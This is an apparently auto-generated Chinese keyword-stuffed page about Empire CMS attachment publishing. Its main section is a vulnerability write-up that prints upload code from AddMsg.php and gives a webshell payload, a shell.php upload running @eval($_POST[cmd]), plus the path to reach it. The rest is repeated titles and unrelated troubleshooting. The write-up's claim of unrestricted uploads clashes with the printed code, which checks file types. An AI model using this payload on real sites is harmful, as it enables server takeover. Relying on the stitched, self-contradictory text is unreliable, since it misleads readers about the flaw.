帝国cms 附件远程发布
编辑整理:整理来源:油管,浏览量:85,时间:2023-03-03 08:00:01
帝国cms 附件远程发布,帝国cms 附件远程发布,帝国cms 附件远程发布
关于帝国cms 附件远程发布内容导航:
1、帝国cms 附件远程发布
漏洞漏洞文件:/e/member/msg/AddMsg.php
漏洞代码:
if($_POST['msave']==1)
{
$filepass='';
$filename='';
if($_FILES['file']['name'])
{
$upload_file_name=str_replace(" ","",$_FILES['file']['name']);
$filetype=GetFiletype($upload_file_name);
if(CheckSaveTranFiletype($filetype))
{
$filetime=date("YmdHis");
$filename=$filetime.".".$filetype;
$filepath=$addpath.$filename;
$fsql=$empire->fetch1("select filepath,filepass from {$dbtbpre}enewsfile_1 where filename='$filename' limit 1");
if($fsql['filepath'])
{
$filepath=$fsql['filepath'];
$filepass=$fsql['filepass'];
}
else
{
$cp=@move_uploaded_file($_FILES['file']['tmp_name'],$filepath);
if(empty($cp))
{
printerror("UploadFileFail","history.go(-1)",1);
}
$filepass=md5($filename);
$sql=$empire->query("insert into {$dbtbpre}enewsfile_1(filename,filesize,adduser,path,filetime,classid,no,type,onclick,id,filepass) values('$filename','$filesize','$logininid','$addpath','$filetime','$classid','$no','$filetype','0','$id','$filepass');");
}
}
else
{
printerror("NotTranFiletype","history.go(-1)",1);
}
}
可以看到,在上传文件时,没有对文件类型进行限制,可以上传任意文件,构造payload:
Content-Disposition: form-data; name="file"; filename="shell.php"
@eval($_POST[cmd]);
?>
即可上传webshell,访问webshell:
http://www.xxx.com/e/data/tmp/shell.php
即可getshell。
2、帝国cms 附件远程发布
3、帝国cms 附件远程发布
1:首页没有调用 2:首页调用不对 3.后台首页没有刷新,只是对栏目页刷新 4.系统扔缓存,需要重新 再刷新去百度吧 一大堆网上
行业热门话题:
【帝国cms 附件远程发布】【帝国cms 附件远程发布】【帝国cms 附件远程发布】帝国cms 附件远程发布完!